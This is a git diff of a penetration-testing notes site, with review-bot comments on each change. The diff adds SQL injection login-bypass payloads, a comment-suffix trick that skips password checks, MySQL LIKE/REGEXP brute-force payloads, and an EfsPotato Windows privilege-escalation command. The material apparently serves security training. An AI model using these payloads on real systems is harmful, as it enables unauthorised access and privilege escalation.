diff --git a/src/exploit/cryptography/algorithm/rsa.md b/src/exploit/cryptography/algorithm/rsa.md
index f1abd48..442b9a8 100644
--- a/src/exploit/cryptography/algorithm/rsa.md
+++ b/src/exploit/cryptography/algorithm/rsa.md
@@ -4,7 +4,7 @@ description: RSA is a public-key cryptosystem that is widely used for secure dat
tags:
- Cryptography
refs:
-date: 2023-09-07
+date: 2024-03-08
draft: false
---
@@ -23,10 +23,10 @@ class RSA:
self.q = getPrime(512)
# calculate n (n is used for both the public key (n, e) and the private key (n, d))
- self.n = p * q
+ self.n = self.p * self.q
# calculate t (totient, or called as 'phi')
- self.t = (p - 1) * (q - 1)
+ self.t = (self.p - 1) * (self.q - 1)
# calculate e (e is one of the puclic key (n, e))
for i in range(2, self.t):
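Review bot: the `self.p`/`self.q` fix is correct (the bare `p`/`q` would raise a NameError in a method), but the loop in the trailing context line, `for i in range(2, self.t):`, will not finish in practice because `self.t` is a ~1024-bit number; use the standard `e = 65537` and check `gcd(e, self.t) == 1`, only falling back to a search if that fails. The context comment also misspells "puclic"; it should read `public`.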
diff --git a/src/exploit/reconnaissance/osint/osint.md b/src/exploit/reconnaissance/osint/index.md
similarity index 97%
rename from src/exploit/reconnaissance/osint/osint.md
rename to src/exploit/reconnaissance/osint/index.md
index c752c54..f67f907 100644
--- a/src/exploit/reconnaissance/osint/osint.md
+++ b/src/exploit/reconnaissance/osint/index.md
@@ -7,7 +7,7 @@ tags:
- Reconnaissance
- Web
refs:
-date: 2024-01-18
+date: 2024-03-08
draft: false
---
@@ -39,6 +39,7 @@ draft: false
- [urlscan.io](https://urlscan.io/)
- [ViewDNS.info](https://viewdns.info/)
- [Wappalyzer](https://www.wappalyzer.com/)
+- [Web Check](https://web-check.xyz/)
- [Whoxy](https://www.whoxy.com/)
- [WhoisXML](https://www.whoisxmlapi.com/)
diff --git a/src/exploit/web/method/web-login-bypass.md b/src/exploit/web/method/web-login-bypass.md
index 0d30972..1ca612f 100644
--- a/src/exploit/web/method/web-login-bypass.md
+++ b/src/exploit/web/method/web-login-bypass.md
@@ -6,7 +6,7 @@ tags:
- Web
refs:
- https://tryhackme.com/room/nosqlinjectiontutorial
-date: 2024-02-08
+date: 2024-03-08
draft: false
---
@@ -43,41 +43,43 @@ root:password
## SQL Injections
+Try the following inputs in the form.
+
```txt
+'
+'--
+'-- -
+'#
+}'
+}'--
+}'-- -
+}'#
+' or 1=1
+' or 1=1--
+' or 1=1-- -
' or '1'='1
' or '1'='1--
-or true--
+' or '1'='1-- -
' or true--
+' or true-- -
+or true--
-UNION SELECT null--
-' UNION SELECT null--
+' UNION SELECT NULL--
+' UNION SELECT NULL,NULL--
' UNION SELECT 1,2--
+UNION SELECT NULL--
```
-### Microsoft, Oracle, PostgreSQL
+### Password Omitting
-```txt
-'--
-' or 1=1--
-' or '1'='1'--
+If we know the username of an existing account, try to add prefix `'-- -` to the username for forcing the server internally to omit the password.
-}" or 1=1--
+```bash
+username: john'-- -
+password: password123 (arbitrary value)
```
-### MySQL
-
-```txt
-'-- -
-'#
-
-' or 1=1#
-' or 1=1-- -
-
-' or '1'='1'-- -
-' or '1'='1'#
-
-}" or 1=1-- -
-```
+When the login is successful, not only can we log in with that user, but we can also fuzz with other usernames.
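Review bot: the fence around `username: john'-- -` is tagged `bash` but the content is not shell; tag it `txt` like the block above it. Deleting the `### Microsoft, Oracle, PostgreSQL` and `### MySQL` sections loses the one fact that made them useful, namely that `#` and `-- -` (MySQL requires whitespace after `--`) are MySQL comment forms while plain `--` applies to the others; a one-line note on that would keep the merged list usable. "forcing the server internally to omit the password" is also vague: the `'-- -` suffix closes the string literal and comments out the rest of the statement, so the password comparison is never evaluated, and the sentence should say that.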
diff --git a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
index b3446d2..9d1cf19 100644
--- a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
+++ b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
@@ -10,7 +10,7 @@ refs:
- https://portswigger.net/web-security/sql-injection/blind
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
- https://tryhackme.com/room/adventofcyber2023
-date: 2024-02-13
+date: 2024-03-08
draft: false
---
@@ -72,12 +72,11 @@ Comment syntax is depending on the database used in the website.
|SQLite|`--`|
||`/*comment*/`|
-
## Basic Injection
-First off, check if we can inject SQL commands into forms or URL params in the target website.
+Check if we can inject SQL commands into forms or URL params in the target website.
```txt
' OR 1=1--
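Review bot: removing the blank line between the `||`/*comment*/`|` table row and `## Basic Injection` puts the heading directly against the table; keep one blank line so every renderer reliably closes the table before the heading. The context line `Comment syntax is depending on the database used in the website.` should read `Comment syntax depends on the database used by the website.`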
@@ -109,7 +108,9 @@ admin or 1=1-- -
admin or 1=1#
```
-### Blind Injection - Timing
+
+
+## Blind Injection - Timing
Reference: [https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing](https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing)
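Review bot: three blank lines before `## Blind Injection - Timing` is more than the rest of the file uses; one is enough. Since this heading is promoted from `###` to `##`, check that any other `###` headings that were its siblings are promoted the same way so the heading hierarchy stays consistent.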
@@ -137,6 +138,18 @@ test' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))
+## Brute Force Values
+
+```html
+' password LIKE '%'-- -
+' password LIKE BINARY '%'-- -
+
+' password REGEXP '^[a-z]*'-- -
+' password REGEXP BINARY '^[a-z]*'-- -
+```
+
+
+
## WAF Bypass
Reference: [https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF)
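Review bot: the fence under the new `## Brute Force Values` heading is tagged `html`, but the lines are SQL fragments; tag it `sql` or `txt`. The payloads also look syntactically incomplete as written: after the closing `'` there is no operator before `password`, so `' password LIKE '%'-- -` would not parse as a WHERE clause and presumably needs `AND` (or `OR`) in between, as in `' AND password LIKE '%'-- -`. A short note that `BINARY` and `REGEXP` are MySQL-specific would help readers, and two of the three blank lines before `## WAF Bypass` should go.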
diff --git a/src/exploit/windows/privilege-escalation/windows-privesc-with-localpotato.md b/src/exploit/windows/privilege-escalation/windows-privesc-with-localpotato.md
index 01ae66c..2c89673 100644
--- a/src/exploit/windows/privilege-escalation/windows-privesc-with-localpotato.md
+++ b/src/exploit/windows/privilege-escalation/windows-privesc-with-localpotato.md
@@ -11,10 +11,26 @@ refs:
- https://tryhackme.com/room/localpotato
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer
- https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
-date: 2023-10-26
+date: 2024-03-08
draft: false
---
+## EfsPotato
+
+### Required Privilege
+
+- `SeImpersonatePrivilege`
+
+### Payloads
+
+- [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
+
+```bash
+EfsPotato "cmd.exe /c whoami"
+```
+
+
+
## GodPotato
### Required Privileges
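Review bot: `### Required Privilege` in the new EfsPotato section is singular while the GodPotato section below uses `### Required Privileges`; use the same heading text in both. The `EfsPotato "cmd.exe /c whoami"` block is tagged `bash`, but it runs in a Windows shell, so `powershell` or `txt` is the better tag. Also trim the three blank lines before `## GodPotato` to one.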